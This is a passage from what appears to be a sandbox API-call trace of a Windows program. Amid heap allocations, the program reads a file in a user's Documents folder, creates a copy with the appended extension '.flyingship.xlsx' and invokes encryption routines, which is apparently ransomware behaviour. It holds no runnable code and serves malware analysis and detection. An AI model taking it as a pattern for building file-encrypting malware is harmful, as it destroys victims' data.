wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0180.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0180.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0180.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0180.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0180.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0180.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0180.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0180.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0180.148] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0180.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0180.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0180.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0180.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0180.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0180.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0180.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.flyingship.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ycwvofdiac7at.flyingship.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0180.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0180.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0180.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0180.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0180.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0180.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0180.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0180.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0180.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0180.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0180.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0180.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0180.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0180.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0180.151] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0180.151] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x1b20, lpOverlapped=0x0) returned 1 [0180.156] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0180.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0180.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1b20) returned 0x900318 [0180.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0180.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0180.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0180.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1b20) returned 0x901e40 [0180.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900318 | out: hHeap=0x8a0000) returned 1 [0180.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.158] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0180.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0180.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1b20) returned 0x900318 [0180.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900318 | out: hHeap=0x8a0000) returned 1 [0180.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0180.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.158] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0180.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0180.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0180.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0180.158] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.159] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0180.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0180.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1b20) returned 0x900318 [0180.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0180.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0180.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1b20) returned 0x903968 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0180.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0180.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.161] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0180.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0180.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0180.161] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0180.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0180.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0180.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0180.162] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0180.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0180.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2888 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0180.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0180.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0180.162] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0180.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0180.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0180.163] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 